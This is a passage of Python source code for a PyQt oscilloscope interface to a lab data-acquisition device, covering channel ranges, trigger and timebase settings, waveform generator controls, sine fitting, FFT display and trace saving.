disconnected\n\t\ttry:\n\t\t\tself.control_od1()\n\t\t\tself.pv1_text('0')\n\t\t\tself.pv2_text('0')\n\t\t\tself.p.set_sqr1(self.SQ1val, self.dutyCycle)\n\t\t\tself.select_wave(self.waveindex)\n\t\t\tself.p.set_wave(self.AWGval)\n\t\t\tself.select_wgain(self.wgainindex)\n\t\t\tself.set_trigger(self.Triglevel*1000)\n\t\t\tself.p.set_sine(self.AWGval)\n\t\t\tself.p.configure_trigger(0, 'A1', 0)\n\t\t\tself.select_range((0,2))\n\t\t\tself.select_range((1,2))\n\t\t\tself.select_range((2,0))\n\t\t\tself.select_range((3,0))\n\t\texcept:\n\t\t\tpass\n\t\t\n\tdef cross_hair(self):\n\t\tif self.Cross.isChecked() == False:\n\t\t\tself.pwin.vLine.setPos(-1)\n\t\t\tself.pwin.hLine.setPos(-17)\n\n\tdef updateTV(self, evt):\n\t\tif self.p == None: return\n\t\tpos = evt[0] \t\t\t## using signal proxy turns original arguments into a tuple\n\t\tif self.pwin.sceneBoundingRect().contains(pos):\n\t\t\tmousePoint = self.pwin.vb.mapSceneToView(pos)\n\t\t\txval = mousePoint.x()\n\n\t\t\tif self.Cross.isChecked() == True:\n\t\t\t\tself.pwin.vLine.setPos(mousePoint.x())\n\t\t\t\tself.pwin.hLine.setPos(mousePoint.y())\n\n\t\t\tfor k in range(self.MAXRES):\n\t\t\t\tself.pwin.removeItem(self.resLabs[k])\n\t\t\t\n\t\t\tt = self.timeData[0]\n\t\t\tindex = 0\n\t\t\tfor k in range(len(t)-1):\t\t# find out Time at the cursor position\n\t\t\t\tif t[k] < xval < t[k+1]:\n\t\t\t\t\tindex = k\n\t\t\t\n\t\t\tself.resLabs[0] = pg.TextItem(\n\t\t\t\ttext= unicode(self.tr('Time: %6.2fmS ')) %t[index],\n\t\t\t\tcolor= self.resultCols[0]\n\t\t\t)\n\t\t\tself.resLabs[0].setPos(0, -11)\n\t\t\tself.pwin.addItem(self.resLabs[0])\n\t\t\t\n\t\t\tfor k in range(self.MAXCHAN):\n\t\t\t\tif self.chanStatus[k] == 1:\n\t\t\t\t\tself.Results[k+1] = unicode(self.tr('%s:%6.2fV ')) %(self.sources[k],self.voltData[k][index])\n\t\t\t\t\tself.resLabs[k+1] = pg.TextItem(text= self.Results[k+1],\tcolor= self.resultCols[k])\n\t\t\t\t\tself.resLabs[k+1].setPos(0, -12 - 1.0*k)\n\t\t\t\t\tself.pwin.addItem(self.resLabs[k+1])\n\n\t\t\t\n\tdef set_offset(self, ch):\n\t\tself.offValues[ch] = self.offSliders[ch].value()\n\t\t\n\tdef __init__(self, device=None):\n\t\tQWidget.__init__(self)\n\t\t\n\t\tself.resultCols = utils.makeResultColors()\n\t\tself.traceCols = utils.makeTraceColors()\n\t\tself.htmlColors = utils.makeHtmlColors()\n\t\tself.p = device\t\t\t\t\t\t# connection to the device hardware \n\t\t\t\n\t\tself.chanStatus = [1,0,0,0]\t\t\t# PyQt problem. 
chanStatus somehow getting preserved ???\t\t\n\n\t\tleft = QVBoxLayout()\t\t\t\t# left side vertical layout\n\t\tfor ch in range(self.MAXCHAN):\n\t\t\tself.offSliders[ch] = utils.sliderVert(-4, 4, 0, 40, None)\n\t\t\tleft.addWidget(self.offSliders[ch])\n\t\t\tself.offSliders[ch].valueChanged.connect(partial (self.set_offset,ch))\n\t\t\tself.offSliders[ch].setStyleSheet(\"border: 1px solid %s;\"%self.htmlColors[ch])\n\t\t\n\n\t\twin = pg.GraphicsWindow()\n\t\tself.pwin = win.addPlot()\n\t\tself.pwin.proxy = pg.SignalProxy(self.pwin.scene().sigMouseMoved, rateLimit=60, slot=self.updateTV)\t\t\t\t\n\t\tself.pwin.showGrid(x=True, y=True)\t\t\t\t\t\t# with grid\n\t\t\n\n\t\tfor k in range(self.MAXCHAN):\t\t\t\t\t\t\t# pg textItem to show the voltage scales\n\t\t\tself.scaleLabs[k] = pg.TextItem(text='')\n\n\t\tfor k in range(self.MAXRES):\t\t\t\t\t\t# pg textItem to show the Results\n\t\t\tself.resLabs[k] = pg.TextItem()\n\t\t\tself.pwin.addItem(self.resLabs[k])\n\t\t\n\t\tvLine = pg.InfiniteLine(angle=90, movable=False, pen = 'w')\n\t\tself.pwin.addItem(vLine, ignoreBounds=True)\n\t\tself.pwin.vLine=vLine\n\t\tself.pwin.vLine.setPos(-1)\n\t\thLine = pg.InfiniteLine(angle=0, movable=False, pen = 'w')\n\t\tself.pwin.addItem(hLine, ignoreBounds=True)\n\t\tself.pwin.hLine=hLine\n\t\tself.pwin.hLine.setPos(-17)\n\t\t\n\t\tax = self.pwin.getAxis('bottom')\n\t\tax.setLabel(self.tr('Time (mS)'))\t\n\t\tax = self.pwin.getAxis('left')\n\t\tax.setStyle(showValues=False)\n\t\tax.setLabel(self.tr('Voltage'))\n\t\t\n\t\tself.set_timebase(self.TBval)\n\t\tself.pwin.disableAutoRange()\n\t\tself.pwin.setXRange(0, self.tbvals[self.TBval]*10)\n\t\tself.pwin.setYRange(-16, 16)\n\t\tself.pwin.hideButtons()\t\t\t\t\t\t\t\t\t# Do not show the 'A' button of pg\n\n\t\tfor ch in range(self.MAXCHAN):\t\t\t\t\t\t\t# initialize the pg trace widgets\n\t\t\tself.traceWidget[ch] = self.pwin.plot([0,0],[0,0], pen = self.traceCols[ch])\n\t\tself.diffTraceW = self.pwin.plot([0,0],[0,0], pen = self.traceCols[-1])\n\n\t\tright = QVBoxLayout()\t\t\t\t\t\t\t# right side vertical layout\n\t\tright.setAlignment(Qt.AlignTop)\n\t\tright.setSpacing(self.RPVspacing)\t\t\n\n\t\tl = QLabel(text= '' +self.tr('DC Voltages at A1, A2 and A3'))\n\t\tl.setMinimumWidth(self.RPWIDTH)\n\t\tright.addWidget(l)\n\n\t\tH = QHBoxLayout()\n\t\tfor k in range(3):\n\t\t\tH.setAlignment(Qt.AlignLeft)\n\t\t\tself.voltMeterCB[k] = QCheckBox(self.tr(self.sources[k]))\n\t\t\tH.addWidget(self.voltMeterCB[k])\n\t\t\tself.voltMeters[k] = QLabel()\n\t\t\tself.voltMeters[k].setMinimumWidth(50)\n\t\t\tH.addWidget(self.voltMeters[k])\n\t\tright.addLayout(H)\n\n\t\tH = QHBoxLayout()\n\t\tl = QLabel(text=self.tr('Resistance on SEN = '))\n\t\tH.addWidget(l)\n\t\tself.RES = QLabel()\n\t\tH.addWidget(self.RES)\n\t\tright.addLayout(H)\n\t\t\n\t\tH = QHBoxLayout()\n\t\tb = QPushButton(self.tr(\"Click for Capacitance on IN1\"))\n\t\tb.setMinimumWidth(200)\n\t\tH.addWidget(b)\n\t\tb.clicked.connect(self.measure_cap)\n\t\tself.CAP = QLabel('')\n\t\tH.addWidget(self.CAP)\n\t\tright.addLayout(H)\n\n\t\tH = QHBoxLayout()\n\t\tb = QPushButton(self.tr(\"Click for Frequency on IN2\"))\n\t\tb.setMinimumWidth(200)\n\t\tH.addWidget(b)\n\t\tb.clicked.connect(self.measure_freq)\n\t\tself.IN2 = QLabel('')\n\t\tH.addWidget(self.IN2)\n\t\tright.addLayout(H)\n\n\t\tH = QHBoxLayout()\n\t\tself.OD1 = QCheckBox(self.tr(\"Enable OD1\"))\n\t\tH.addWidget(self.OD1)\n\t\tself.OD1.stateChanged.connect(self.control_od1)\n\t\tself.CCS = QCheckBox(self.tr(\"Enable 
CCS\"))\n\t\tH.addWidget(self.CCS)\n\t\tself.CCS.stateChanged.connect(self.control_ccs)\n\t\tright.addLayout(H)\n\n\t\tH = QHBoxLayout()\n\t\tl = QLabel(text=self.tr('WG Shape'))\n\t\tH.addWidget(l)\n\t\tself.Wshape = QPushButton('sine')\n\t\tmenu = QMenu()\n\t\tfor k in range(len(self.Waves)):\n\t\t\tmenu.addAction(self.Waves[k], lambda index=k: self.select_wave(index))\n\t\tself.Wshape.setMenu(menu)\n\t\tH.addWidget(self.Wshape)\n\n\t\tl = QLabel(text=self.tr('Amplitude'))\n\t\tH.addWidget(l)\n\n\t\tself.Wgain = QPushButton(self.Wgains[self.wgainindex])\n\t\tmenu = QMenu()\n\t\tfor k in range(len(self.Wgains)):\n\t\t\tmenu.addAction(self.Wgains[k], lambda index=k: self.select_wgain(index))\n\t\tself.Wgain.setMenu(menu)\n\t\tH.addWidget(self.Wgain)\n\t\tright.addLayout(H)\n\t\t\n\t\tH = QHBoxLayout()\n\t\tl = QLabel(text=self.tr('WG'))\n\t\tl.setMaximumWidth(30)\n\t\tH.addWidget(l)\n\t\tself.AWGslider = utils.slider(self.AWGmin, self.AWGmax, self.AWGval,100,self.awg_slider)\n\t\tH.addWidget(self.AWGslider)\n\t\tself.AWGtext = utils.lineEdit(100, self.AWGval, 6, self.awg_text)\n\t\tH.addWidget(self.AWGtext)\n\t\tl = QLabel(text=self.tr('Hz'))\n\t\tl.setMaximumWidth(40)\n\t\tl.setMinimumWidth(40)\n\t\tH.addWidget(l)\n\t\tright.addLayout(H)\n\t\t\n\t\tH = QHBoxLayout()\n\t\tl = QLabel(text=self.tr('SQ1'))\n\t\tl.setMaximumWidth(30)\n\t\tl.setMinimumWidth(30)\n\t\tH.addWidget(l)\n\t\tself.SQ1slider = utils.slider(self.SQ1min, self.SQ1max, self.SQ1val,100,self.sq1_slider)\n\t\tH.addWidget(self.SQ1slider)\n\t\tself.SQ1text = utils.lineEdit(60, self.SQ1val, 6, self.sq1_text)\n\t\tH.addWidget(self.SQ1text)\n\t\tl = QLabel(text=self.tr('Hz'))\n\t\tl.setMaximumWidth(15)\n\t\tH.addWidget(l)\n\t\tself.SQ1DCtext = utils.lineEdit(30, 50, 6, self.sq1_dc)\n\t\tH.addWidget(self.SQ1DCtext)\n\t\tl = QLabel(text=self.tr('%'))\n\t\tl.setMaximumWidth(15)\n\t\tH.addWidget(l)\n\t\tright.addLayout(H)\n\n\t\tH = QHBoxLayout()\n\t\tl = QLabel(text=self.tr('PV1'))\n\t\tl.setMaximumWidth(25)\n\t\tH.addWidget(l)\n\t\t\n\t\tself.PV1slider = utils.slider(self.PV1min*1000, self.PV1max*1000, self.PV1val*1000,100,self.pv1_slider)\n\t\tH.addWidget(self.PV1slider)\n\t\t\n\t\tself.PV1text = utils.lineEdit(100, self.PV1val, 6, self.pv1_text)\n\t\tH.addWidget(self.PV1text)\n\t\tl = QLabel(text=self.tr('Volt'))\n\t\tl.setMaximumWidth(40)\n\t\tl.setMinimumWidth(40)\n\t\tH.addWidget(l)\n\t\tright.addLayout(H)\n\n\t\tH = QHBoxLayout()\n\t\tl = QLabel(text=self.tr('PV2'))\n\t\tl.setMaximumWidth(25)\n\t\tH.addWidget(l)\n\n\t\tself.PV2slider = utils.slider(self.PV2min*1000, self.PV2max*1000, self.PV2val*1000,100,self.pv2_slider)\n\t\tH.addWidget(self.PV2slider)\n\t\t\n\t\tself.PV2text = utils.lineEdit(100, self.PV2val, 6, self.pv2_text)\n\t\tH.addWidget(self.PV2text)\n\t\tl = QLabel(text=self.tr('Volt'))\n\t\tl.setMaximumWidth(40)\n\t\tl.setMinimumWidth(40)\n\t\tH.addWidget(l)\n\t\tright.addLayout(H)\n\t\t\n\t\t#--------------------------Scope Controls---------------------\n\t\tl = QLabel('' +self.tr('Oscilloscope Channels, Range and Analysis '))\n\t\tright.addWidget(l)\n\n\t\tfor ch in range(4):\n\t\t\tH = QHBoxLayout()\n\t\t\tH.setAlignment(Qt.AlignLeft)\n\t\t\tself.chanSelCB[ch] = QCheckBox()\n\t\t\tself.chanSelCB[ch].stateChanged.connect(partial (self.select_channel,ch))\n\t\t\tH.addWidget(self.chanSelCB[ch])\n\n\t\t\tl = QLabel(text='%s'%(self.htmlColors[ch],self.sources[ch]))\t\t\n\t\t\tl.setMaximumWidth(30)\n\t\t\tl.setMinimumWidth(30)\n\t\t\tH.addWidget(l)\n\t\t\t\n\t\t\tself.rangeSelPB[ch] = QPushButton('4 
V')\n\t\t\tself.rangeSelPB[ch].setMaximumWidth(60)\n\t\t\tmenu = QMenu()\n\t\t\tif ch <= 1:\n\t\t\t\tfor k in range(len(self.Ranges12)):\n\t\t\t\t\tmenu.addAction(self.Ranges12[k], lambda index=(ch,k): self.select_range(index))\n\t\t\telse:\t\n\t\t\t\tfor k in range(len(self.Ranges34)):\n\t\t\t\t\tmenu.addAction(self.Ranges34[k], lambda index=(ch,k): self.select_range(index))\n\t\t\tself.rangeSelPB[ch].setMenu(menu)\n\t\t\tH.addWidget(self.rangeSelPB[ch])\n\t\t\tself.fitSelCB[ch] = QCheckBox('')\n\t\t\tself.fitSelCB[ch].setMaximumWidth(30)\n\t\t\tH.addWidget(self.fitSelCB[ch])\n\t\t\tself.fitResLab[ch] = QLabel('') \n\t\t\tH.addWidget(self.fitResLab[ch])\n\t\t\tright.addLayout(H)\n\t\tself.chanSelCB[0].setChecked(True)\n\n\t\tH = QHBoxLayout()\n\t\tl = QLabel(text=self.tr('Timebase'))\n\t\tl.setMaximumWidth(60)\n\t\tH.addWidget(l)\n\t\tself.TBslider = utils.slider(0, 8, self.TBval, 180, self.set_timebase)\n\t\tH.addWidget(self.TBslider)\n\t\tl = QLabel(text=self.tr('mS/div'))\n\t\tl.setMaximumWidth(60)\n\t\tH.addWidget(l)\n\t\tright.addLayout(H)\n\n\t\tH = QHBoxLayout()\n\t\tl = QLabel(text=self.tr('Trigger'))\n\t\tl.setMaximumWidth(60)\n\t\tH.addWidget(l)\n\t\tself.Trigslider = utils.slider(-3300, 3300, self.Triglevel, 150, self.set_trigger)\n\t\tH.addWidget(self.Trigslider)\n\t\tl = QLabel(text=self.tr('On'))\n\t\tl.setMaximumWidth(30)\n\t\tH.addWidget(l)\t\n\t\tself.Trigbutton = QPushButton(self.tr('A1'))\n\t\tself.Trigbutton.setMaximumWidth(50)\n\t\tmenu = QMenu()\n\t\tfor k in range(len(self.sources)):\n\t\t\tmenu.addAction(self.sources[k], lambda index=k :self.select_trig_source(index))\n\t\tself.Trigbutton.setMenu(menu)\n\t\tH.addWidget(self.Trigbutton)\n\t\tright.addLayout(H)\n\n\t\tH = QHBoxLayout()\n\t\tself.SaveButton = QPushButton(self.tr(\"Save Traces\"))\n\t\t#self.SaveButton.setMaximumWidth(80)\n\t\tself.SaveButton.clicked.connect(self.save_data)\t\t\n\t\tH.addWidget(self.SaveButton)\n\t\t\t\n\t\t#self.Filename = utils.lineEdit(100, self.tr('scope.txt'), 20, None)\n\t\t#H.addWidget(self.Filename)\n\t\t\n\t\tself.FFT = QPushButton(self.tr(\"Fourier Transform\"))\n\t\t#self.FFT.setMaximumWidth(50)\n\t\tH.addWidget(self.FFT)\n\t\tself.FFT.clicked.connect(self.show_fft)\t\t\n\t\n\t\tright.addLayout(H)\n\t\t\n\t\tH = QHBoxLayout()\n\t\tself.Cross = QCheckBox(self.tr(\"Cross hair\"))\n\t\tself.Cross.stateChanged.connect(self.cross_hair)\n\t\tH.addWidget(self.Cross)\n\n\t\tself.Freeze = QCheckBox(self.tr(\"Freeze\"))\n\t\tH.addWidget(self.Freeze)\n\t\tself.Diff = QCheckBox(self.tr('A1-A2'))\n\t\tH.addWidget(self.Diff)\n\t\tself.Diff.stateChanged.connect(self.show_diff)\n\t\tright.addLayout(H)\n\n\t\t#------------------------end of right panel ----------------\n\t\t\n\t\ttop = QHBoxLayout()\n\t\ttop.addLayout(left)\n\t\ttop.addWidget(win)# self.pwin)\n\t\ttop.addLayout(right)\n\t\t\n\t\tfull = QVBoxLayout()\n\t\tfull.addLayout(top)\n\t\tself.msgwin = QLabel(text=self.tr('messages'))\n\t\tfull.addWidget(self.msgwin)\n\t\t\t\t\n\t\tself.setLayout(full)\n\t\t\n\t\tself.timer = QTimer()\n\t\tself.timer.timeout.connect(self.update)\n\t\tself.timer.start(self.TIMER)\n\n\t\tself.recover()\n\t\t#----------------------------- end of init ---------------\n\t\n\t\n\tdef update(self):\n\t\tif self.Freeze.isChecked(): return\n\n\t\ttry:\n\t\t\tif self.chanStatus[2] == 1 or self.chanStatus[3] == 1: # channel 3 or 4 selected \t\n\t\t\t\tself.timeData[0], self.voltData[0],\t\\\n\t\t\t\tself.timeData[1], self.voltData[1], \\\n\t\t\t\tself.timeData[2], self.voltData[2], \\\n\t\t\t\tself.timeData[3], 
self.voltData[3] = self.p.capture4(self.NP, self.TG)\t\t\t\t\n\t\t\telif self.chanStatus[1] == 1: \t# channel 2 is selected \t\n\t\t\t\tself.timeData[0], self.voltData[0], \\\n\t\t\t\tself.timeData[1], self.voltData[1] = self.p.capture2(self.NP, self.TG)\n\t\t\telif self.chanStatus[0] == 1: \t\t# only A1 selected\n\t\t\t\tself.timeData[0], self.voltData[0] = self.p.capture1('A1', self.NP, self.TG)\n\t\texcept:\n\t\t\tself.comerr()\n\t\t\treturn\n\t\t\t\n\t\tfor ch in range(4):\n\t\t\tif self.chanStatus[ch] == 1:\n\t\t\t\tr = 16./self.rangeVals[ch]\n\t\t\t\tself.traceWidget[ch].setData(self.timeData[ch], self.voltData[ch] * r + 4*self.offValues[ch] )\n\t\t\t\tif np.max(self.voltData[ch]) > self.rangeVals[ch]:\n\t\t\t\t\tself.msg(unicode(self.tr('%s input is clipped. Increase range')) %self.sources[ch])\n\n\t\t\t\tif self.fitSelCB[ch].isChecked() == True:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tfa = em.fit_sine(self.timeData[ch],self.voltData[ch])\n\t\t\t\t\texcept Exception as err:\n\t\t\t\t\t\tprint('fit_sine error:', err)\n\t\t\t\t\t\tfa=None\n\t\t\t\t\tif fa != None:\n\t\t\t\t\t\tself.voltDataFit[ch] = fa[0]\n\t\t\t\t\t\tself.Amplitude[ch] = abs(fa[1][0])\n\t\t\t\t\t\tself.Frequency[ch] = fa[1][1]*1000\n\t\t\t\t\t\tself.Phase[ch] = fa[1][2] * 180/em.pi\n\t\t\t\t\t\ts = unicode(self.tr('%5.2f V, %5.1f Hz')) %(self.Amplitude[ch],self.Frequency[ch])\n\t\t\t\t\t\tself.fitResLab[ch].setText(s)\n\t\t\t\telse:\n\t\t\t\t\tself.fitResLab[ch].setText('')\n\n\t\tif self.Diff.isChecked() == True and self.chanStatus[0] == 1 and self.chanStatus[1] == 1:\n\t\t\tr = 16./self.rangeVals[0]\n\t\t\tself.diffTraceW.setData(self.timeData[0], r*(self.voltData[0]-self.voltData[1]))\n\n\t\tself.loopCounter += 1\n\t\tif self.loopCounter % 5 == 0:\n\t\t\tfor ch in range(3):\n\t\t\t\tif self.voltMeterCB[ch].isChecked() == True:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tv = self.p.get_voltage(self.sources[ch])\t\t# Voltmeter functions\n\t\t\t\t\texcept:\n\t\t\t\t\t\tself.comerr()\n\n\t\t\t\t\tself.voltMeters[ch].setText(unicode(self.tr('%5.3f V')) %(v))\n\t\t\t\telse:\n\t\t\t\t\tself.voltMeters[ch].setText(self.tr(''))\t\t\t\n\t\t\ttry:\n\t\t\t\tres = self.p.get_resistance()\n\t\t\t\tif res != np.Inf and res > 100 and res < 100000:\n\t\t\t\t\tself.RES.setText(''+unicode(self.tr('%5.0f Ohm')) %(res))\n\t\t\t\telse:\n\t\t\t\t\tself.RES.setText(self.tr('<100Ohm or >100k'))\n\t\t\t\tself.p.select_range('A1', self.rangeVals[0])\n\t\t\t\tself.p.select_range('A2', self.rangeVals[1])\n\t\t\texcept:\n\t\t\t\tself.comerr()\n\t\t# End of update\n\n\n\tdef show_diff(self):\n\t\tif self.Diff.isChecked() == False:\n\t\t\t\tself.diffTraceW.setData([0,0], [0,0])\n\t\n\tdef showRange(self, ch):\n\t\tspacing = self.tbvals[self.TBval]\n\t\tself.pwin.removeItem(self.scaleLabs[ch])\n\t\tif self.chanStatus[ch] == 0: \n\t\t\treturn\n\t\tself.scaleLabs[ch] = pg.TextItem(text=self.rangeTexts[ch],\tcolor= self.resultCols[ch], angle=315)\n\t\tself.scaleLabs[ch].setPos(ch*spacing/3, 15.5)\n\t\t#self.scaleLabs[ch].setText('hello')\n\t\tself.pwin.addItem(self.scaleLabs[ch])\n\n\tdef select_channel(self, ch):\n\t\tif self.chanSelCB[ch].isChecked() == True:\n\t\t\tself.chanStatus[ch] = 1\n\t\t\tself.traceWidget[ch] = self.pwin.plot([0,0],[0,0], pen=self.traceCols[ch])\n\t\telse:\n\t\t\tself.chanStatus[ch] = 0\n\t\t\tself.pwin.removeItem(self.traceWidget[ch])\n\t\tself.showRange(ch)\n\n\tdef select_range(self,info):\n\t\tch = info[0]\n\t\tindex = info[1]\n\t\tif ch <= 1:\n\t\t\tself.rangeTexts[ch] = self.Ranges12[index]\n\t\t\tself.rangeVals[ch] = 
self.RangeVals12[index]\n\t\t\ttry:\n\t\t\t\tself.p.select_range(self.sources[ch], self.RangeVals12[index])\n\t\t\texcept:\n\t\t\t\tself.comerr()\n\t\t\t\treturn\t\t\n\t\telse:\n\t\t\tself.rangeTexts[ch] = self.Ranges34[index]\n\t\t\tself.rangeVals[ch] = self.RangeVals34[index]\n\t\tself.rangeSelPB[ch].setText(self.rangeTexts[ch])\n\t\tself.showRange(ch)\n\t\tss1 = '%s'%self.sources[ch]\n\t\tss2 = '%s'%self.rangeTexts[ch]\n\t\tself.msg(self.tr('Range of') + ss1 + self.tr(' set to ') + ss2)\n\t\n\n\tdef show_fft(self):\n\t\tfor ch in range(4):\n\t\t\tif self.chanStatus[ch] == 1:\n\t\t\t\ttry:\t\n\t\t\t\t\tfa = em.fit_sine(self.timeData[ch],self.voltData[ch])\n\t\t\t\texcept Exception as err:\n\t\t\t\t\tprint('fit_sine error:', err)\n\t\t\t\t\tfa=None\n\t\t\t\tif fa != None:\n\t\t\t\t\tfr = fa[1][1]*1000\t\t\t# frequency in Hz\n\t\t\t\t\tdt = int(1.e6/ (20 * fr))\t# dt in usecs, 20 samples per cycle\n\t\t\t\t\ttry:\n\t\t\t\t\t\tt,v = self.p.capture1(self.sources[ch], 3000, dt)\n\t\t\t\t\texcept:\n\t\t\t\t\t\tself.comerr()\n\n\t\t\t\t\txa,ya = em.fft(v,dt)\n\t\t\t\t\txa *= 1000\n\t\t\t\t\tpeak = self.peak_index(xa,ya)\n\t\t\t\t\typos = np.max(ya)\n\t\t\t\t\tpop = pg.plot(xa,ya, pen = self.traceCols[ch])\n\t\t\t\t\tpop.showGrid(x=True, y=True)\n\t\t\t\t\ttxt = pg.TextItem(text=unicode(self.tr('Fundamental frequency = %5.1f Hz')) %peak, color = 'w')\n\t\t\t\t\ttxt.setPos(peak, ypos)\n\t\t\t\t\tpop.addItem(txt)\n\t\t\t\t\tpop.setWindowTitle(self.tr('Frequency Spectrum'))\n\t\t\t\telse:\n\t\t\t\t\tself.msg(self.tr('FFT Error'))\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\tdef peak_index(self, xa, ya):\n\t\tpeak = 0\n\t\tpeak_index = 0\n\t\tfor k in range(2,len(ya)):\n\t\t\tif ya[k] > peak:\n\t\t\t\tpeak = ya[k]\n\t\t\t\tpeak_index = xa[k]\n\t\treturn peak_index\n\t\t\n\tdef save_data(self):\n\t\tself.timer.stop()\n\t\tfn = QFileDialog.getSaveFileName()\n\t\tif fn != '':\n\t\t\tdat = []\n\t\t\tfor ch in range(4):\n\t\t\t\tif self.chanStatus[ch] == 1:\n\t\t\t\t\tdat.append( [self.timeData[ch], self.voltData[ch] ])\n\t\t\tself.p.save(dat,fn)\n\t\t\tss = unicode(fn)\n\t\t\tself.msg(self.tr('Traces saved to ') + ss)\n\t\tself.timer.start(self.TIMER)\n\n\n\tdef select_trig_source(self, index):\n\t\tself.Trigindex = index\n\t\tsrc = self.sources[self.Trigindex]\n\t\tself.Trigbutton.setText(self.sources[self.Trigindex])\n\t\ttry:\n\t\t\tself.p.configure_trigger(self.Trigindex, self.sources[self.Trigindex], self.Triglevel)\n\t\texcept:\n\t\t\tself.comerr()\n\n\tdef set_trigger(self, tr):\n\t\tself.Triglevel = tr * 0.001\t\t# convert to volts\n\t\ttry:\n\t\t\tif self.TBval > 3:\n\t\t\t\tself.p.configure_trigger(self.Trigindex, self.sources[self.Trigindex], self.Triglevel,resolution=10,prescaler=5)\n\t\t\telse:\n\t\t\t\tself.p.configure_trigger(self.Trigindex, self.sources[self.Trigindex], self.Triglevel)\n\t\texcept:\n\t\t\tself.comerr()\n\t\t\t\n\tdef set_timebase(self, tb):\n\t\tself.TBval = tb\n\t\tself.pwin.setXRange(0, self.tbvals[self.TBval]*10)\n\t\tmsperdiv = self.tbvals[int(tb)]\t\t\t\t#millisecs / division\n\t\ttotalusec = msperdiv * 1000 * 10.0 \t# total 10 divisions\n\t\tself.TG = int(totalusec/self.NP)\n\t\tif self.TG < self.MINDEL:\n\t\t\tself.TG = self.MINDEL\n\t\telif self.TG > self.MAXDEL:\n\t\t\tself.TG = self.MAXDEL\n\t\tfor k in range(self.MAXCHAN):\n\t\t\tself.showRange(k)\n\n\tdef pv1_text(self, text):\n\t\ttry:\n\t\t\tval = float(text)\n\t\texcept:\n\t\t\treturn\n\t\tval = float(text)\n\t\tif self.PV1min <= val <= self.PV1max:\n\t\t\tself.PV1val = 
val\n\t\t\ttry:\n\t\t\t\tself.p.set_pv1(val)\n\t\t\t\tself.PV1slider.setValue(int(val*1000))\n\t\t\texcept:\n\t\t\t\tself.comerr()\n\n\tdef pv1_slider(self, pos):\n\t\tval = float(pos)/1000.0\n\t\tif self.PV1min <= val <= self.PV1max:\n\t\t\tself.PV1val = val\n\t\t\tself.PV1text.setText(unicode(val))\n\t\t\ttry:\n\t\t\t\tself.p.set_pv1(val)\n\t\t\texcept:\n\t\t\t\tself.comerr()\n\n\tdef pv2_text(self, text):\n\t\ttry:\n\t\t\tval = float(text)\n\t\texcept:\n\t\t\treturn\n\t\tval = float(text)\n\t\tif self.PV2min <= val <= self.PV2max:\n\t\t\tself.PV2val = val\n\t\t\ttry:\n\t\t\t\tself.p.set_pv2(val)\n\t\t\t\tself.PV2slider.setValue(int(val*1000))\n\t\t\texcept:\n\t\t\t\tself.comerr()\n\t\t\t\t\n\tdef pv2_slider(self, pos):\n\t\tval = float(pos)/1000.0\n\t\tif self.PV2min <= val <= self.PV2max:\n\t\t\tself.PV2val = val\n\t\t\tself.PV2text.setText(unicode(val))\n\t\t\ttry:\n\t\t\t\tself.p.set_pv2(val)\n\t\t\texcept:\n\t\t\t\tself.comerr()\n\t\t\t\t\n\tdef sq1_dc(self, text):\n\t\ttry:\n\t\t\tval = float(text)\n\t\texcept:\n\t\t\treturn\n\t\tif 1 <= val <= 99:\n\t\t\tself.dutyCycle = val\n\t\t\ts = self.SQ1text.text()\n\t\t\tself.sq1_text(s)\n\n\tdef sq1_text(self, text):\n\t\ttry:\n\t\t\tval = float(text)\n\t\texcept:\n\t\t\treturn\n\t\tif self.SQ1min <= val <= self.SQ1max:\n\t\t\tself.SQ1val = val\n\t\t\tself.SQ1slider.setValue(self.SQ1val)\n\t\t\ttry:\n\t\t\t\tif 0 <= val < 4 : val = 0\n\t\t\t\tres = self.p.set_sqr1(val, self.dutyCycle)\n\t\t\t\tss = '%5.1f'%res\n\t\t\t\tself.msg(self.tr('sqr1 set to ') + ss)\n\t\t\texcept:\n\t\t\t\tself.comerr()\n\n\tdef sq1_slider(self, val):\n\t\tif self.SQ1min <= val <= self.SQ1max:\n\t\t\tself.SQ1val = val\n\t\t\tself.SQ1text.setText(unicode(val))\n\t\t\ts = self.SQ1text.text()\n\t\t\tself.sq1_text(s)\n\t\t\t\t\n\tdef select_wgain(self,index):\n\t\tself.Wgain.setText(self.Wgains[index])\n\t\tself.wgainindex = index\n\t\ttry:\n\t\t\tself.p.set_sine_amp(index)\n\t\texcept:\n\t\t\tself.comerr()\n\n\tdef set_wave(self):\n\t\ttry:\n\t\t\tif self.waveindex <= 1:\n\t\t\t\tres = self.p.set_wave(self.AWGval, self.Waves[self.waveindex])\n\t\t\t\tss = '%6.2f'%res\n\t\t\t\tself.msg(self.tr('AWG set to ') + ss + self.tr(' Hz'))\n\t\t\telse:\n\t\t\t\tself.p.set_sqr2(self.AWGval)\n\t\t\t\tself.msg(self.tr('Output Changed from WG to SQ2'))\n\t\texcept:\n\t\t\tself.comerr()\n\n\tdef select_wave(self,index):\n\t\tself.Wshape.setText(self.Waves[index])\n\t\tself.waveindex = index\n\t\tself.set_wave()\n\n\tdef awg_text(self, text):\n\t\ttry:\n\t\t\tval = float(text)\n\t\t\tif self.AWGmin <= val <= self.AWGmax:\n\t\t\t\tself.AWGval = val\n\t\t\t\tself.AWGslider.setValue(self.AWGval)\n\t\t\t\tself.set_wave()\n\t\texcept:\n\t\t\treturn\n\n\tdef awg_slider(self, val):\n\t\tif self.AWGmin <= val <= self.AWGmax:\n\t\t\tself.AWGval = val\n\t\t\tself.AWGtext.setText(unicode(val))\n\t\t\tself.set_wave()\n\n\tdef control_od1(self):\n\t\ttry:\n\t\t\tstate = self.OD1.isChecked()\n\t\t\tif state == True:\n\t\t\t\tself.p.set_state(OD1=1)\n\t\t\telse:\n\t\t\t\tself.p.set_state(OD1=0) \n\t\texcept:\n\t\t\tself.comerr()\n \n\tdef control_ccs(self):\n\t\ttry:\n\t\t\tstate = self.CCS.isChecked()\n\t\t\tif state == True:\n\t\t\t\tself.p.set_state(CCS=1)\n\t\t\telse:\n\t\t\t\tself.p.set_state(CCS=0) \n\t\texcept:\n\t\t\tself.comerr()\n\t\t\t\n\tdef measure_cap(self):\n\t\ttry:\n\t\t\tcap = self.p.get_capacitance()\n\t\t\tif cap == None:\n\t\t\t\tself.msg(self.tr('Capacitance too high or short to ground'))\n\t\t\telse:\n\t\t\t\tif cap < 1.0e-9:\n\t\t\t\t\tss = 
